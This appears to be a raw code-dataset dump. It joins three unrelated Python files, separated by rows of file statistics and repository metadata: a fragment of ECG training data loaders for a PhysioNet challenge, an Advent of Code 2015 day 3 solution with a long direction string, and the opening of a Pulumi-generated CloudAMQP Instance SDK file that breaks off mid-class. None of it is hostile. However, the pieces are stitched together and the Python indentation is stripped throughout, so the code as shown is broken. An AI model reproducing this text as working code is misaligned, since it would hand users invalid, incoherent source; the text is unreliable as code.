train_recordings = torch.from_numpy(train_recordings)
train_class_weights = torch.from_numpy(train_class_weights)
train_labels_onehot = torch.from_numpy(train_labels_onehot)
val_recordings = torch.from_numpy(val_recordings)
val_class_weights = torch.from_numpy(val_class_weights)
val_labels_onehot = torch.from_numpy(val_labels_onehot)
self.train_dataset = CustomTensorDataset(train_recordings, train_labels_onehot, train_class_weights)
self.val_dataset = CustomTensorDataset(val_recordings, val_labels_onehot, val_class_weights)
end = time.time()
print('time to get and process data: {}'.format(end - start))
class ChallengeDataLoader(BaseDataLoader):
"""
challenge2020 data loading
"""
def __init__(self, train_dataset, val_dataset, batch_size=256, shuffle=True, num_workers=0):
self.train_dataset = train_dataset
self.val_dataset = val_dataset
super().__init__(self.train_dataset, self.val_dataset, None, batch_size, shuffle, num_workers)
# self.valid_data_loader.file_names = file_names
# self.valid_data_loader.idx = val_index
class FineTuningDataset_2(BaseDataLoader):
"""
challenge2020 data loading
"""
def __init__(self, label_dir, split_index, batch_size=256, shuffle=True, num_workers=2, resample_Fs=300, window_size=3000, n_segment=1,
normalization=False, training_size=None, train_aug=None, val_aug=None, p=0.5, lead_number=2, save_data=False, load_saved_data=False, to_extract_peaks=False, to_contrast=False, to_filter_noise=False, network_factor=32, to_include_E=True, dataset_name = 'CustomDataset'):
self.label_dir = label_dir
self.dir2save_data = '/data/ecg/challenge2021/data/'
dir2save_data = '/data/ecg/challenge2021/data/'
start = time.time()
# Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
weights_file = 'weights.csv'
# Load the scored classes and the weights for the Challenge metric.
print('Loading weights...')
_, weights, indices = load_weights(weights_file)
classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
### equivalent SNOMED CT codes merged, noted as the larger one
classes = classes.split(',')
self.weights = weights
# Load the label and output files.
print('Loading label and output files...')
label_files = my_find_challenge_files(label_dir)
### load file names
# idx2del = np.load('process/idx2del.npy')
label_files_tmp = []
count = 0
for f in label_files:
count += 1
fname = f.split('/')[-1].split('.')[0]
if fname[0] == 'A' or fname[0] == 'E':
label_files_tmp.append(f)
label_files = label_files_tmp
labels_onehot = load_labels(label_files, classes)
split_idx = loadmat(split_index)
train_index, val_index = split_idx['train_index'], split_idx['val_index']
train_index = train_index.reshape((train_index.shape[1],))
if training_size is not None: # for test
train_index = train_index[0:training_size]
val_index = val_index.reshape((val_index.shape[1],))
num_files = len(label_files)
label_files_train, label_files_val = [], []
label_train, label_val = [], []
for i in train_index:
label_files_train.append(label_files[i])
label_train.append(labels_onehot[i])
for i in val_index:
label_files_val.append(label_files[i])
label_val.append(labels_onehot[i])
### 12 leads order: I II III aVL aVR aVF V1 V2 V3 V4 V5 V6
if lead_number == 2: # two leads: I II
leads_index = [0, 1]
elif lead_number == 3: # three leads: I II V2
leads_index = [0, 1, 7]
elif lead_number == 4: # four leads: I II III V2
leads_index = [0, 1, 2, 7]
elif lead_number == 6: # six leads: I II III aVL aVR aVF
leads_index = [0, 1, 2, 3, 4, 5]
elif lead_number == 8: # eight leads
leads_index = [0, 1, 6, 7, 8, 9, 10, 11]
else: # twelve leads
leads_index = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
train_aug = [
{
"type": "SlideAndCut",
"args": {
"window_size": 4992,
"sampling_rate": 500
}
}
]
val_aug = [
{
"type": "SlideAndCut",
"args": {
"window_size": 4992,
"sampling_rate": 500
}
}
]
train_transforms = None
if train_aug is not None and len(train_aug) > 0:
train_transforms = []
for aug in train_aug:
key = aug['type']
module_args = dict(aug['args'])
current_transform = getattr(module_transformers, key)(**module_args)
train_transforms.append(current_transform)
train_transforms = transforms.Compose(train_transforms)
val_transforms = None
if val_aug is not None and len(val_aug) > 0:
val_transforms = []
for aug in val_aug:
key = aug['type']
module_args = dict(aug['args'])
current_transform = getattr(module_transformers, key)(**module_args)
val_transforms.append(current_transform)
val_transforms = transforms.Compose(val_transforms)
# Dataset = eval(dataset_name)
#tmp
# label_files_train = label_files_train[0:300]
# label_files_val = label_files_val[0:300]
self.train_dataset = CustomDataset4PeakDetection(label_files_train, label_train, label_dir, leads_index, sample_rate=resample_Fs,
transform=train_transforms)
self.val_dataset = CustomDataset4PeakDetection(label_files_val, label_val, label_dir, leads_index, sample_rate=resample_Fs, transform=val_transforms)
end = time.time()
print('time to get and process data: {}'.format(end - start))
super().__init__(self.train_dataset, self.val_dataset, None, batch_size, shuffle, num_workers)
class ChallengeDataset_2(BaseDataLoader):
"""
challenge2020 data loading
"""
def __init__(self, label_dir, split_index, batch_size=256, shuffle=True, num_workers=2, resample_Fs=500, window_size=3000, n_segment=1,
normalization=False, training_size=None, train_aug=None, val_aug=None, p=0.5, lead_number=2, save_data=False, load_saved_data=False, to_extract_peaks=False, to_contrast=False, to_filter_noise=False, network_factor=32, to_include_E=True, dataset_name = 'CustomDataset'):
self.label_dir = label_dir
self.dir2save_data = '/data/ecg/challenge2021/data/'
dir2save_data = '/data/ecg/challenge2021/data/'
start = time.time()
# Define the weights, the SNOMED CT code for the normal class, and equivalent SNOMED CT codes.
weights_file = 'weights.csv'
# Load the scored classes and the weights for the Challenge metric.
print('Loading weights...')
_, weights, indices = load_weights(weights_file)
classes = "164889003,164890007,6374002,426627000,733534002,713427006,270492004,713426002,39732003,445118002,164947007,251146004,111975006,698252002,426783006,63593006,10370003,365413008,427172004,164917005,47665007,427393009,426177001,427084000,164934002,59931005"
### equivalent SNOMED CT codes merged, noted as the larger one
classes = classes.split(',')
self.weights = weights
# Load the label and output files.
print('Loading label and output files...')
label_files = my_find_challenge_files(label_dir)
### load file names
# idx2del = np.load('process/idx2del.npy')
label_files_tmp = []
count = 0
for f in label_files:
count += 1
fname = f.split('/')[-1].split('.')[0]
# if fname[0] == 'S' or fname[0] == 'I':
# continue
label_files_tmp.append(f)
label_files = label_files_tmp
labels_onehot = load_labels(label_files, classes)
split_idx = loadmat(split_index)
train_index, val_index = split_idx['train_index'], split_idx['val_index']
train_index = train_index.reshape((train_index.shape[1],))
if training_size is not None: # for test
train_index = train_index[0:training_size]
val_index = val_index.reshape((val_index.shape[1],))
num_files = len(label_files)
label_files_train, label_files_val = [], []
label_train, label_val = [], []
for i in train_index:
if i >= len(label_files):
print(i)
label_files_train.append(label_files[i])
label_train.append(labels_onehot[i])
for i in val_index:
label_files_val.append(label_files[i])
label_val.append(labels_onehot[i])
### 12 leads order: I II III aVL aVR aVF V1 V2 V3 V4 V5 V6
if lead_number == 2: # two leads: I II
leads_index = [0, 1]
elif lead_number == 3: # three leads: I II V2
leads_index = [0, 1, 7]
elif lead_number == 4: # four leads: I II III V2
leads_index = [0, 1, 2, 7]
elif lead_number == 6: # six leads: I II III aVL aVR aVF
leads_index = [0, 1, 2, 3, 4, 5]
elif lead_number == 8: # eight leads
leads_index = [0, 1, 6, 7, 8, 9, 10, 11]
else: # twelve leads
leads_index = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11]
train_aug = [
{
"type": "SlideAndCut",
"args": {
"window_size": 4992,
"sampling_rate": 500
}
}
]
val_aug = [
{
"type": "SlideAndCut",
"args": {
"window_size": 4992,
"sampling_rate": 500
}
}
]
train_transforms = None
if train_aug is not None and len(train_aug) > 0:
train_transforms = []
for aug in train_aug:
key = aug['type']
module_args = dict(aug['args'])
current_transform = getattr(module_transformers, key)(**module_args)
train_transforms.append(current_transform)
train_transforms = transforms.Compose(train_transforms)
val_transforms = None
if val_aug is not None and len(val_aug) > 0:
val_transforms = []
for aug in val_aug:
key = aug['type']
module_args = dict(aug['args'])
current_transform = getattr(module_transformers, key)(**module_args)
val_transforms.append(current_transform)
val_transforms = transforms.Compose(val_transforms)
# Dataset = eval(dataset_name)
#tmp
# label_files_train = label_files_train[0:300]
# label_files_val = label_files_val[0:300]
self.train_dataset = CustomDataset4PeakDetection(label_files_train, label_train, label_dir, leads_index, sample_rate=resample_Fs,
transform=train_transforms)
self.val_dataset = CustomDataset4PeakDetection(label_files_val, label_val, label_dir, leads_index, sample_rate=resample_Fs, transform=val_transforms)
end = time.time()
print('time to get and process data: {}'.format(end - start))
super().__init__(self.train_dataset, self.val_dataset, None, batch_size, shuffle, num_workers)
| 44.82763 | 286 | 0.610167 | 4,214 | 35,369 | 4.851448 | 0.065259 | 0.032772 | 0.014674 | 0.00587 | 0.937145 | 0.934504 | 0.921884 | 0.914498 | 0.914498 | 0.910292 | 0 | 0.105127 | 0.288105 | 35,369 | 788 | 287 | 44.884518 | 0.706819 | 0.111906 | 0 | 0.873016 | 0 | 0.008818 | 0.114698 | 0.049743 | 0 | 0 | 0 | 0 | 0 | 1 | 0.012346 | false | 0.005291 | 0.021164 | 0 | 0.045855 | 0.044092 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
34f2f77f6075f72b20a54c50e4b66f1a3a0b5026 | 9,120 | py | Python | 15/3_vacuum.py | 0LL13/advent | 917a10a43fcdba3bd9ce3140a8b8cb44b1fc8c0f | [
"Unlicense"
] | null | null | null | 15/3_vacuum.py | 0LL13/advent | 917a10a43fcdba3bd9ce3140a8b8cb44b1fc8c0f | [
"Unlicense"
] | null | null | null | 15/3_vacuum.py | 0LL13/advent | 917a10a43fcdba3bd9ce3140a8b8cb44b1fc8c0f | [
"Unlicense"
] | null | null | null | # -*- coding: utf-8 -*-
"""
^>v< means start-north-east-south-west --> twice at start, once at n, e, s
"""
dirs = '^><^>>>^<^v<v^^vv^><<^<><<vv^<>^<^v>^vv<>v><vv^^<>>^^^v<<vv><<^>^<^v<^>^v><<<v^<v<<<v<<vv<v<^><^>><>v>v^<<v^^<^v<><^>^<<^^^>v>>v^^<v>>^>vv><v>>^>>v^>^v>^<^^v>^>^^v<v>^^<v<>>v^^v><^><^<<>v^<^<^v<v>v^>>>v^v^>^<>^v<^^vv<v>^>^<>^^<vv^<><<v<^<^^>vv<>^>v<^>^v>v^>^v<>^><>><vv<>v^v<><>v^v>>>>v^^>^><^^<v<^><^<v>>^v^v<>v<<<^<<vvvv<<v^vv^>v^^^<^^^<v>>v<^v>>>>>v<^^^^>v<^<><v>>>>><v>>v^vvvv^^<v^<>^v<^v^>v><^>^v<<>>vv^>v>v^^>vv^<^vvv<>><>><><^^^<v<>^<^^^<v><^v>>v>^v<v^vv^<>^^^>v^^^v>>^v^^<^>>^>^<<v>>>^^<>>^vv>v^<^>>>><v<><><^^v<><<<<^^<>>^<vvv^><>v<v<<<<><v<<v>v<v^><vv<v^>^<^>v^^><^v>^^>v<>^v^<>^vv^><v^^vv>vvv>v>^<vv^>>^>>^>><>>>^^^^v<vv>^<>v^^><v^>^<>v<^^v><v<<><^v><>^^^^^v^v>>^^v><<><<vv>^^^^><^>v>><<<^v>v^^>^v^<^^v>v<^<<>>^v<<<v<<>>v<^v^><vv<v^v>v^<v>><v>^v<<<vv^>v<v>>v>>v><v><v^>v^^v>^v^>>>><>^>v>^v^>>>>v^<<vv<^v><<>v<v^<^^<<v<^v^^v^>vv><vv<v^<^>><^^>^<><^^<v<><^v^v^<^^>^<v><^<v>v^<<<^^v<v>^v>>><>^^>vv<<^v^<<<<^^>>>v>v<<<>^^>>>v>^>v>vv<<>^<^><v^>^^<^<v<<v<^>>^v^<vvv><>v^><<v>^^<v^vv^^^<vvv^<^>^>vv>><^v<^<<v<><<><<^^<><><vv>v>^<v>>^<>>^^v>vv^<^^v>><^vv^<<v^^><<>vv<v<><v<><v^^^v^v>^v<^<>v^^>><>^<^<v^<v^v^>v<<<^<<^>>>^^<^^v>v^<v>vvvv>v<>><^>^<<<<v^<v<>v^^^v<>v>^<v<<^^v^^<>^<<v^^<^<v>v>>v>>v^>^<vv<<<<<^<><>v><>>>v^>^v<^<><<v<^v^^<^<><^>^^^>^><>^><<vv>^<>vv<<v^v<<<<<>>>v<vv>^v>^>^>^<^><>v<><>>>^^<v>^<^v>>^<><v^><v^>>>v<v^^vvv^><v<v>v^>vvvv>>><^>v<>^^^>v>>v^<v<>v^>^<v^>^<<^>^>>v<<><<v^^>>v^<v^<^v^>^>v^><<^<v>v^<v>>^^<<v>v><<<^v^<>^<>^>>^<<v>^^<>^v<>v^>>><<v>><v^>^><v^<><v><>><v^<>vv>v^<^^^>v>^^<vv>>^v<><>>><>><^<>>v>v^^>^^<^^>^>>v>vv^^v<^<^v><vv<v<^>><<vvv<<><^>^v>^^^<<>v^<v<v><<v>^^v<<<>^^vv<^>vv>^>^<><<>vv<^>v^vv>^^^v><<^vv>^v<><v^^^^v^>vv^^<^<>^^v^<^vv<v<vv<>v>v^^<>^^>^^>^<><<^v>^><^^vvvv<><>^<v^^>v<>^><>v>><>vv^<<><<>><>v<^>^v>>^^v><<<>>^<^v^<v<<<v^>^^<^<><><^><<<<^<vv><v<<><vvv^^><vv>^<<vv<<<^v<>>><><>>v><<<v>vvvv^^vv<v>><<^v^vvv><><vv>v><>v<<<^<v^>><^^>v^<v>><v>^^^v^v>><<<v<^^>>^v<>v^<vv^^<<v<v>v<<<<^^^v^v<<>>>v>>vv>^^<><^v<v><>>v^>>>>>^>v^v^<^v^v^vvv>v<v<^>vv^<<v>vv>>v^^vv<^v>>>>vv<>v<>^^vv^<v>v^>>vvv<<<v<<^vv^^^^>v>v>^><<<^>v^><v<^<<<v>^v^^^><<><<<^^<^^<>^<v>^<v<<v<^^vv>v<^v><v><v<>^v<^<v<^<v^v><v>><v<v<<>^<v<>>><>^v^v<<^><v^<<v<v^>^>v><^>^vv^^<v<v<vv<v>^v^v^>^<<>>>>>v^<>^>v^vv^><<>>^^<>v^><v>^vvv^>v^v><>^><<>v>v<^<^><^^vv<<><>>v>>v><vv>>^v<<>^vv<>^vv>v>v>^>^>>><><<>v<v>^<<^v^^<<<><v>>vv<^<vv<vv^<<v<<^v><<>v<^^^<<^v^>^v>^^^v^v>>>v>v^v>^>^vv<^^<<vv^>^<<<vv>v^<><<^vvv^^><>vv^v>v>^><<^^^^vvv^<vvv>><^v<^>^<>>^<v<<vv>>><v>vv^<>><v^<v>^v>^>v>^<^<^^^<<vvvv^>>>>>>>v><vv>^<>^^v^><>><^v^^<v^v<<<<v^>><>v^v<vv<><^<<<<^>^^>vv>><^v<v^v<<>^vvv>v^^><^^<^<>>^^v^vv<>v<^<<<v^^^><v<vv<<>v>v<>^v^><v^vv^v^^v<^^v^^v><>v<^v>><<^<^v^>><<vv<<^>^<<v^<>^><>v><vv^v>>^<v<<<^>vv<^v>^>v<<v>^>>^>>v^<v<v>>^v<^v^v><<><>^><<<><v<vvvv<v^<v^v><>^<>^^^^v>^>^vvvvv>v>>v><<vv<<v<><<^><<^v><<v<<<v><vv<^>^v>>>>^v<^v<<>>^>^<<vv^<^>v>><<^>^>^v><><>^><<v<>v^><<^v^<^^><^^v^<<^v^^>>^v^<^><vv>v^^<<^^^<><>^>v^v>v^>^v^vv>^^>>>>^^<^>>>^^v<vv<><^^<vvv<^^^vv>v<v<v>><<<>^>^^>^>^v<<<<>>^<<>><v>>v>^^<^v<>v<>v^>v^><^<^^><v^^v>^^vv<v<<>><<vv<>>v>^<<<<v<<v>^><^^<^<^<v^<<^^v>^v<^>v^v^<v^vv^>^^><^>v^v>>^^v^><vv<v<v<v>>>>><<><v><v^v^<v^<^^<v<>^>v>v<>>>v>^^^^>><v^v^^v<<<>v^<<^<v>>>><^v^<<><v<>>v><><v<v^v>^v^^<v<^<^^v>><<vv<<vv><>>^>^>vv<^<>^vvv^v<v^^<>v^v>^^<<<<<>^v^>^<>v^^<>v^v<vv>^<>vv^<^vv>><v^^vvvvv>><<>v<vv^<^<vv^v^<>^^<v^<vv^<v^v^v<<^>^>^>^^>>>vvv>^>v>v>>>^>vv^><>^><>v>^^<v^>^><<v>><<<>>v<vvvv^>^v<^<>^<v>^<>^^<<><>^v<><>>>^vv<^<<^<^v>v<<<<<^^v<^v<><v<<><^>v>^v>>^v^><^^^^v<><><>vv^<>vv<^v<^^><v^<^><^^v^v^<^^<<><v>v<v<v^<<^v><>v^v<^>vvv><<^v>>v><><v<<^>>>v<^>>v>^<>><>^<v^v^<vv<<^>v<^^>^<^v<^<<^^v<>>^>^>^v^^v^v<v^^vv^<v>>v><vv^vv>v<>v^>v^^>^^>><v><v^<<><<>><<^^>><^v<v<><<><<><v<v^<^<v>>>><v^^v^^>>>^^^^^<<vv<^><>^<<<vv^^^>^><<<v<^v>^<v<^>^vvv<<>vv><<>v>v^v>>>>>^<>><^^^><<<<v><<vv>>>v<^<vv^v^<<v>>>>^^vvv>v<>><v>>>v>>^v^vvv<<>vvv<<^^^<>vv^^v<<>^^^>>^<^v^<^^>v^><v>>^<<^v<<vv<vv>v^>>^>v^><^><>^>>>vv>><^^^>vv<<^^vv><^<>^>^^<^<>>^vv^>>^v><>v^>>><<<^^<^>^>v<^>^<^^<>>><^^<>^v^<<vvv<v><>vvv><v>v^v<<^<v>^^><<^vv^v>v>v<<^v^<<<>^><><vvv>v>^vv^v<>vv^>^^<^>^>v^^<vv^>v><v<<<><>>^v<^<><><^<v^^<<^<v>vv<><<>v^<v^>^>^^<><<>^<^<<v^^v<v^<><<>v>><^<<>^>^v^v<v^v><^>>^v<^>v<<>^^^<^v>>>^<v>vvvv<<v^<^^>vvvv>v<>v<v><vvvvv>^<><>vvv<>^<<>^>>>>v^<^<><^v>v^>>v><>^><<v^>^<<>^>^v^<v^^>>^v><v>^<v><>v^<^^>v>^>>>v^v>>>^<>^<>>>>>v>>vv^v<><<<><><v><<vv<<v<><>>vv<^<vv>^v<<>v^v<^v<><v>>^v>>vvv^^v>>v>^>^>v><v><^>^^<<>^v<^<<<<^>v<^>>v^<^v>^v<<>^>^vvv<^^vv>^vv>vv<>>v>v<v>>v^<<<<<^^v^>v>^<<<v^v>>v<v><vvv><v>^<vv><<>>^<^>^^<>>>>^<^v<>v^^>^<^^v<^><>><v>>^v^vv<^v<^><<vvv<>><>><^^>^<^v^<^<>v<<<^v>v^^^<>v^<v^>^v^>><>^^<v<^><<^^v^<>^<^vv>>><^v><v^>vv<^v<<<v^>>v>v^v>^<v>v<^<>v^vvv>^vv<<<<v><^><v>>^^>><^v><<^>v^^<<v^^<^<><<<<>^<v<^v^>v<<^^>v<<<<<vvv<v<^>^>^>^>>^>>>v^<<v>>^^v><vv<^v<v<^^^>>>^vvv<^v<>>>vv>^^><^v>vv^>>v>v^<>^<vv>^>^<<^>^^^>>^vv>^^>vvvv<>>^^^^>>>v>v^^>vv>vv^<<>^><^<v^vvvv><v<><v>><<<v<v<<^v><vv^vv^<>>>^>^<v<^v<>><^<vv^^><v>v^>v^<><v^vvv>^>v^^v^>^^>v<<<<^<<^>>v>v^^^<<<v>>>^^v>v<v><<<<^^^v>^vv^>><>^v<v<<^^<<<<><>>>v>vvv^v^^v^>>vv>^>><>^v><^v^><^^>vv>^<^<^>><v>v>><><><v>^>^>v>vv>vv>^^>v>v^><v<<v^<>^>^v>^^v>^<^v<>>vvv^^>^>vv<v<v<<^<^<v^<>v^^v<^<^>vv^^<v><^^^>v>vv<<v>v<<v^<v^^><vv>^>^v^<^>v<^>^<>vv^><v<^><>>^>>^<^><<>^<^>v>v><>>>^<<^><<v><^v<v><>>vv<^><v^>>v>v>>>>^^>v<^v^>><<^<>>v><^><<^>^<vv^^<><<>><vvvv^>^^<><^^v>^^>vv>^v<v>>^^v^<v<^><^<<>>v^^^<^><^<<><<v<>><<>^v>vvv^vvv^^>>^<^<v>><>^<<<<^^<>>>v^<<^^v>><><<v<^>v>^v<v^>v>vv^><>^><<><^^>^>^<><>><^^<v^v<^><><><v>^<v<<v^<<^^^v<v<^v<>>><^v<<<<>>^v>^^vv^v^<<v>><<<v>vv>>v>>^v^<>>vv^<^>^<<>v<<<^vv<^vv^vv<^v^^^<vv^>v>>v<^^<^^vvv<^^v<>>>^>v^><v>^^><>vv>v>v<<<^^v<^vv^v>^^^>>>^^<>^^<^vvv>><><<><^<v>><<>^>^^<v^v^>vv>vv<v>^^<^^<<><><<v><v^^>v><v><<>v>vvv<^^^^<^>>><<<^^^<^>vv^^v>>v<<v^^<vv^<^>vvv^^v^^<^<vv>v<^<>^<<vv^^>^v>>^><><>v<v<v<>><v>>>^^>>v^><v^^<^>><>v<><<v^v<v<<>>>><>>>>><<^vvv<<><><<>^><><<^^v><<^>v>^>^v>v>>^^<><^>vv<^<^v>v<><^<<v<><^><>^^^<v^<><vvv^^^<>^^v><v<<<v>><>^>^vv<v^<vv>v>v^vv<v^v<v>^v^>v><>v^><>v>^^^^><<vv^><v<<v<^<>^v^^^>^^><<<v<^<v^>^^>v><vvvvv^<^<v^^>v<^v^^vv^<<<<v><^>v>v^v><><v^<<^<<v<^^^>^><v^v^<><><>^v<v>^<>^v>^v>v^<><^><v>>v<<^><^vv^<><^<>><>><v<v><<^^^^>v<^<^vv<><^vv><<^<<v>v^>>^v>^>v^^v>vv<v>v<<v>v<>^>>vv^>>><>^v^^<^>v<<^<^^v^^v^<<v<<v<^v<>vv^<v>><^v<^>>>vv^^<v^<>^^v<v<v>>^><^^^<><<^^>v<<vv>><<vvv>><<v^v^>><>vv^><<^>^><^v<^<^<vv<^^vv>v^v<<<<<<><<vv^vv>vv>v<^><<><><<>>v>><v><^>^v>^v^<>v^^^><^^<<<^vv^vv>^v^vvv^^>v^<v>><^<^<^<>^vv<vv^v^^>^^^>vv^v>>><<<^<>>v>v<^^<><v>>><><^v^^<<><<<>^<^^v^>v<vv^^^^>><v><^<<v<<v<>^>^>>^<>^v><>>^<v<vv^<<^<<>vv^>^^<<<^v<>>^v<>vvv<<^^<<><vvvvv<<^<^^<>>>>^^<><>^><>^v<v^^v<<v^^<^<^>v<v>^v<^>^v<>v^vv<><<v>^vvv<><<^>>^^><><>^<>^>v^^v^><v<><>>v><v^<v<<v>><^v>^<v<^>v<<<>vvv^<^^v<vvv^vv<>^<>^>>v<>^^><><v>>^><^^vv>><<>><v><^><>>^vv>v<vv<>v^v^^v<<^^<vv>v^^vv<<^<<><>^<><v^><^<^<>>^vv<v>v>>^<^vv>^vv^>v>^<><^><^<>v^v^^<^<>^^v>>><^v<>v^v<<^>v><>^^<<v^v<>v^>>v>^<><vv^v<v^<vv<>^>^>^<^>v><<><><><<<>^>><v^^><^>><v>>^v<<<^<<>^><<^>>>>>v<^>v>>v^<v^>^>v^^><>v^v^vvvv<v<v<>v>>><<>^<<vvv><v^v^>v<v^^^>>^<v>>^vv^^<vv><^>>v<v^><vvv<^^>>vv^v<^<>^v^<<v>^<<><<<^vvv^>^^<<>>><v<^>vv<<^<><^v<^<><<^^>vv^v>v^^^>>>>^>vv<<v>v>>^^v^^><>v<<^><^<v^>>^>v^v>><^v^>v<<^<v><^<^<^<>>v^^>><<<>v<v>v<^^>^vv<<<^^<v<>v^^>v<<><^<>^^>^v<>v>><^^^vv^>^><>v^^<v^<>>^<v^^^><v<><vvv>v>^<<^v>^>>>>><^^^<>v<v>>v^^<^v^>>v^<<v^>^>v^v>>>>^>>vv<>^<^v><v^^<>v>v^v>^<>^>v<vv><<v<^v<<^v<<^v^vv<><>^<>>^<>>^<>v^><<>^v>>^^^^<<^v><>^<^>^^v><^^<^<v^<^^v>^v><vv>v<<^>^>><<^^^vvv<<^vv<^^>v^^vv^<^^<<^^>>^^<vv<v<<v^^<<v<^vvv<<><<v>v^>>v^^>v<^>^><v<^>v<v^v<v^^<>v>><<v^v^v<^^^><v>v><^<^vv>^^v>^>v<<^vv><^^^^^^><<^>>>^v<>^^v<<<>><<<v^><>^<<<v>v^>^^^<^><v>^^^v<<>v<v>^<v^>><<^^<<^v<<>^v>>vv>><v<^><v<<<vvv><vv><<^v^^<v^vvv<^v>>v^v<v^v^>>^^v<><^^^<^^>v>^<><v<<v^^>vvv^v^^<v<v^v>^>v^^v<^><v^^<<<<>^^>>^v<><^><^<<^vv^<><<>v^vv^<v^<><<<^^>v<<>>>v<>v<><<<v>^v>^^v>^^>v>^>^>v<>><>^>^>^vvvv<^<v^<>^^^^v>v>><<v>>^<vv>>^<v<^v^vv>><>^^>v^^<<><^<v>><<<<>v>^^><v^^v<<v<><vv^v>^<v^^>v<<<<v^v<<>>vv<v<<<v>v>>v<^v>>v>v^<<<>^>^>^<>v<^^vv><^v<<^v<vvv^vv>v<^<<^^vv^^>vv<^>v>^^<<v^<<^^v<>^>v<<^^<^>^^^v^^<v<^<^>>>v^vv^<^v>^<>^<^<v<^v>>>^<^v<><v<^vv<v>v><v^v^^v<vv><^^<><>^>v<^<^vv>><^v><v<>^<>^^>^<><<<v^>>^<>><<><v>vvv^<<^<vv<v><v<^<<<^>^>>v<^>>vv>^v^^^v<>v<>><>^vv^>vv^' # noqa
dirs_1 = '>>v<^>'
dirs_2 = '^v'
dirs_3 = '^>v<'
dirs_4 = '^v^v^v^v^v'
x_dict = {'<': -1, '>': 1}
y_dict = {'^': 1, 'v': -1}
def get_coord(string, x, y):
if string in x_dict:
x = x + x_dict[string]
else:
y = y + y_dict[string]
return x, y
def travel(dirs):
santa = []
robo = []
x = y = a = b = 0
santa.append((x, y))
robo.append((a, b))
i = 3
for string in dirs:
if i % 2 == 1:
x, y = get_coord(string, x, y)
santa.append((x, y))
i += 1
else:
a, b = get_coord(string, a, b)
robo.append((a, b))
i += 1
min_houses = len(set(santa + robo))
print(min_houses)
if __name__ == '__main__':
for drs in [dirs_2, dirs_3, dirs_4]:
travel(drs)
| 190 | 8,209 | 0.266886 | 1,693 | 9,120 | 1.422918 | 0.031896 | 0.772935 | 0.902864 | 0.94479 | 0.84973 | 0.813201 | 0.804483 | 0.789954 | 0.778331 | 0.740141 | 0 | 0.002045 | 0.034868 | 9,120 | 47 | 8,210 | 194.042553 | 0.271643 | 0.011184 | 0 | 0.235294 | 0 | 0.029412 | 0.913087 | 0.909313 | 0 | 0 | 0 | 0 | 0 | 1 | 0.058824 | false | 0 | 0 | 0 | 0.088235 | 0.029412 | 0 | 0 | 1 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 15 |
34fa08174c26bb526414826e2ac343ef1626b1af | 32,240 | py | Python | sdk/python/pulumi_cloudamqp/instance.py | pulumi/pulumi-cloudamqp | 1d411fb0076c257b51a6b133aaedb9292efa2373 | [
"ECL-2.0",
"Apache-2.0"
] | 2 | 2020-09-23T11:53:33.000Z | 2021-12-01T20:56:35.000Z | sdk/python/pulumi_cloudamqp/instance.py | pulumi/pulumi-cloudamqp | 1d411fb0076c257b51a6b133aaedb9292efa2373 | [
"ECL-2.0",
"Apache-2.0"
] | 53 | 2019-12-09T20:12:27.000Z | 2022-03-31T15:21:00.000Z | sdk/python/pulumi_cloudamqp/instance.py | pulumi/pulumi-cloudamqp | 1d411fb0076c257b51a6b133aaedb9292efa2373 | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2019-12-11T09:29:16.000Z | 2019-12-11T09:29:16.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['InstanceArgs', 'Instance']
@pulumi.input_type
class InstanceArgs:
def __init__(__self__, *,
plan: pulumi.Input[str],
region: pulumi.Input[str],
name: Optional[pulumi.Input[str]] = None,
no_default_alarms: Optional[pulumi.Input[bool]] = None,
nodes: Optional[pulumi.Input[int]] = None,
rmq_version: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
vpc_subnet: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a Instance resource.
:param pulumi.Input[str] plan: The subscription plan. See available plans
:param pulumi.Input[str] region: The region to host the instance in. See Instance regions
:param pulumi.Input[str] name: Name of the CloudAMQP instance.
:param pulumi.Input[bool] no_default_alarms: Set to true to discard creating default alarms when the instance is created. Can be left out, will then use default value = false.
:param pulumi.Input[int] nodes: Number of nodes, 1, 3 or 5. **DEPRECATED. In order to change number of nodes, the subscription `plan` needs to be updated.**
:param pulumi.Input[str] rmq_version: The Rabbit MQ version. Can be left out, will then be set to default value used by CloudAMQP API. **Note: There is not yet any support in the provider to change the RMQ version. Once it's set in the initial creation, it will remain.**
:param pulumi.Input[Sequence[pulumi.Input[str]]] tags: One or more tags for the CloudAMQP instance, makes it possible to categories multiple instances in console view. Default there is no tags assigned.
:param pulumi.Input[str] vpc_subnet: Creates a dedicated VPC subnet, shouldn't overlap with other VPC subnet, default subnet used 10.56.72.0/24. **NOTE: extra fee will be charged when using VPC, see [CloudAMQP](https://cloudamqp.com) for more information.**
"""
pulumi.set(__self__, "plan", plan)
pulumi.set(__self__, "region", region)
if name is not None:
pulumi.set(__self__, "name", name)
if no_default_alarms is not None:
pulumi.set(__self__, "no_default_alarms", no_default_alarms)
if nodes is not None:
pulumi.set(__self__, "nodes", nodes)
if rmq_version is not None:
pulumi.set(__self__, "rmq_version", rmq_version)
if tags is not None:
pulumi.set(__self__, "tags", tags)
if vpc_subnet is not None:
pulumi.set(__self__, "vpc_subnet", vpc_subnet)
@property
@pulumi.getter
def plan(self) -> pulumi.Input[str]:
